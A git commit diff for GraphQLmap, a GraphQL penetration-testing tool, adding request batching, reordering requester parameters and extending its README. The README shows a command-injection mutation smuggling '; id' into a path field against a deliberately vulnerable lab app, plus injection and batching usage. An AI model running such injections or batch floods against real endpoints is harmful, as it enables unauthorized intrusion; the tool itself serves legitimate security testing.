Fix parameters order in requester + batching queries
parent
e4eeaa372a
commit
59305d7570
48
README.md
48
README.md
|
@ -7,8 +7,8 @@
|
|||
* [Features and examples](#features-and-examples)
|
||||
- [Dump a GraphQL schema](#dump-a-graphql-schema)
|
||||
- [Interact with a GraphQL endpoint](#interact-with-a-graphql-endpoint)
|
||||
- Execute GraphQL queries
|
||||
- Autocomplete queries
|
||||
- [Execute GraphQL queries](#)
|
||||
- [Autocomplete queries](#)
|
||||
- [GraphQL field fuzzing](#graphql-field-fuzzing)
|
||||
- [Example 1 - Bruteforce a character](#example-1---bruteforce-a-character)
|
||||
- [Example 2 - Iterate over a number](#example-2---iterate-over-a-number)
|
||||
|
@ -46,6 +46,16 @@ optional arguments:
|
|||
--proxy [PROXY] HTTP proxy to log requests
|
||||
```
|
||||
|
||||
Development setup
|
||||
|
||||
```ps1
|
||||
python -m venv .venv
|
||||
source .venv/bin/activate
|
||||
pip install --editable .
|
||||
pip install -r requirements.txt
|
||||
./bin/graphqlmap -u http://127.0.0.1:5013/graphql
|
||||
```
|
||||
|
||||
|
||||
## Features and examples
|
||||
|
||||
|
@ -110,6 +120,21 @@ GraphQLmap > {doctors(options: 1, search: "{ \"lastName\": { \"$regex\": \"Admin
|
|||
}
|
||||
```
|
||||
|
||||
It also works with `mutations`, they must be written in a single line.
|
||||
|
||||
```ps1
|
||||
# ./bin/graphqlmap -u http://127.0.0.1:5013/graphql --proxy http://127.0.0.1:8080 --method POST
|
||||
GraphQLmap > mutation { importPaste(host:"localhost", port:80, path:"/ ; id", scheme:"http"){ result }}
|
||||
{
|
||||
"data": {
|
||||
"importPaste": {
|
||||
"result": "uid=1000(dvga) gid=1000(dvga) groups=1000(dvga)\n"
|
||||
{
|
||||
{
|
||||
{
|
||||
```
|
||||
|
||||
|
||||
### GraphQL field fuzzing
|
||||
|
||||
Use `GRAPHQL_INCREMENT` and `GRAPHQL_CHARSET` to fuzz a parameter.
|
||||
|
@ -168,6 +193,21 @@ GraphQLmap > { paste(pId: "9") {id,title,content,public,userAgent} }
|
|||
}
|
||||
```
|
||||
|
||||
### GraphQL Batching
|
||||
|
||||
GraphQL supports Request Batching. Batched requests are processed one after the other by GraphQL
|
||||
Use `BATCHING_PLACEHOLDER` before a query to send it multiple times inside a single request.
|
||||
|
||||
```ps1
|
||||
GraphQLmap > BATCHING_3 {__schema{ types{namea}}}
|
||||
[+] Sending a batch of 3 queries
|
||||
[+] Successfully received 3 outputs
|
||||
|
||||
GraphQLmap > BATCHING_2 {systemUpdate}
|
||||
[+] Sending a batch of 2 queries
|
||||
[+] Successfully received 2 outputs
|
||||
```
|
||||
|
||||
### NoSQLi injection
|
||||
|
||||
Use `BLIND_PLACEHOLDER` inside the query for the `nosqli` function.
|
||||
|
@ -192,11 +232,11 @@ GraphQLmap > mssqli
|
|||
|
||||
## Practice
|
||||
|
||||
* [Damn Vulnerable GraphQL Application - @dolevf](https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application/blob/master/setup.py)
|
||||
* [Damn Vulnerable GraphQL Application - @dolevf](https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application/blob/master/setup.py) : `docker run -t -p 5013:5013 -e WEB_HOST=0.0.0.0 dolevf/dvga`
|
||||
|
||||
## TODO
|
||||
|
||||
* GraphQL Field Suggestions : Find
|
||||
* GraphQL Field Suggestions
|
||||
* Generate mutation query
|
||||
* Unit tests
|
||||
* Handle node
|
||||
|
|
|
@ -12,7 +12,7 @@ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|||
|
||||
class GraphQLmap(object):
|
||||
author = "@pentest_swissky"
|
||||
version = "1.0"
|
||||
version = "1.1"
|
||||
endpoint = "graphql"
|
||||
method = "POST"
|
||||
args = None
|
||||
|
@ -71,7 +71,8 @@ class GraphQLmap(object):
|
|||
blind_mssql(self.url, self.method, self.proxy, self.headers, self.use_json)
|
||||
|
||||
else:
|
||||
exec_advanced(self.url, self.method, query, self.proxy, self.headers, self.use_json)
|
||||
print(self.headers)
|
||||
exec_advanced(self.url, self.method, query, self.headers, self.use_json, self.proxy)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
|
|
@ -87,10 +87,10 @@ def dump_schema(url, method, graphversion, headers, use_json, proxy):
|
|||
print("\033[95m\t(?) mutation{" + fields['name'] + "(" + mutation_args + "){ result }}\033[0m")
|
||||
|
||||
|
||||
def exec_graphql(url, method, query, proxy, headers=None, use_json=False, only_length=0):
|
||||
def exec_graphql(url, method, query, proxy, headers=None, use_json=False, only_length=0, is_batch=0):
|
||||
if headers is None:
|
||||
headers = {}
|
||||
r = requester(url, method, query, headers, use_json, proxy)
|
||||
r = requester(url, method, query, proxy, headers=headers, use_json=use_json, is_batch=is_batch)
|
||||
try:
|
||||
graphql = r.json()
|
||||
errors = graphql.get("errors")
|
||||
|
@ -146,9 +146,26 @@ def exec_advanced(url, method, query, headers, use_json, proxy):
|
|||
length = exec_graphql(url, method, query.replace(pattern, str(i)), proxy, headers, use_json, only_length=1)
|
||||
print("[+] \033[92mQuery\033[0m: (\033[91m{}\033[0m) {}".format(length, query.replace(pattern, str(i))))
|
||||
|
||||
|
||||
# Allow a user to send multiple queries in a single request
|
||||
# e.g: BATCHING_3 {__schema{ types{name}}}
|
||||
elif "BATCHING_" in query:
|
||||
regex = re.compile("BATCHING_(\d*)")
|
||||
match = regex.findall(query)
|
||||
batch = int(match[0])
|
||||
query = query.replace('BATCHING_' + match[0], '')
|
||||
print(f"[+] Sending a batch of {batch} queries")
|
||||
r = requester(url, "POST", query, proxy, headers, use_json, is_batch=batch)
|
||||
output = len(r.json())
|
||||
if output == batch:
|
||||
print(f"[+] Successfully received {batch} outputs")
|
||||
else:
|
||||
print(f"[+] Backend did not sent back {batch} outputs, got {output}")
|
||||
|
||||
|
||||
# Otherwise execute the query and display the JSON result
|
||||
else:
|
||||
print(exec_graphql(url, method, query, proxy, headers, use_json))
|
||||
print(exec_graphql(url, method, query, proxy, headers=headers, use_json=use_json))
|
||||
|
||||
|
||||
def blind_postgresql(url, method, proxy, headers, use_json):
|
||||
|
|
|
@ -20,17 +20,30 @@ def jq(data):
|
|||
return json.dumps(data, indent=4, sort_keys=True)
|
||||
|
||||
|
||||
def requester(url, method, payload, proxy, headers=None, use_json=False):
|
||||
def requester(url, method, payload, proxy, headers=None, use_json=False, is_batch=0):
|
||||
if method == "POST" or use_json:
|
||||
data = {
|
||||
"query": payload.replace("+", " ")
|
||||
}
|
||||
new_headers = {} if headers is None else headers.copy()
|
||||
new_data = data.copy()
|
||||
if use_json:
|
||||
new_headers['Content-Type'] = 'application/json'
|
||||
new_data = json.dumps(data)
|
||||
r = requests.post(url, data=new_data, verify=False, headers=new_headers, proxies=proxy)
|
||||
|
||||
data = None
|
||||
if is_batch == 0:
|
||||
data = {
|
||||
"query": payload.replace("+", " ")
|
||||
}
|
||||
new_data = data.copy()
|
||||
|
||||
if use_json:
|
||||
new_headers['Content-Type'] = 'application/json'
|
||||
new_data = json.dumps(data)
|
||||
r = requests.post(url, data=new_data, verify=False, headers=new_headers, proxies=proxy)
|
||||
|
||||
else:
|
||||
data = []
|
||||
for i in range(is_batch):
|
||||
data.append( {"query": payload} )
|
||||
|
||||
r = requests.post(url, json=data, verify=False, headers=new_headers, proxies=proxy)
|
||||
|
||||
|
||||
if r.status_code == 500:
|
||||
print("\033[91m/!\ API didn't respond correctly to a POST method !\033[0m")
|
||||
return None
|
||||
|
|
Loading…
Reference in New Issue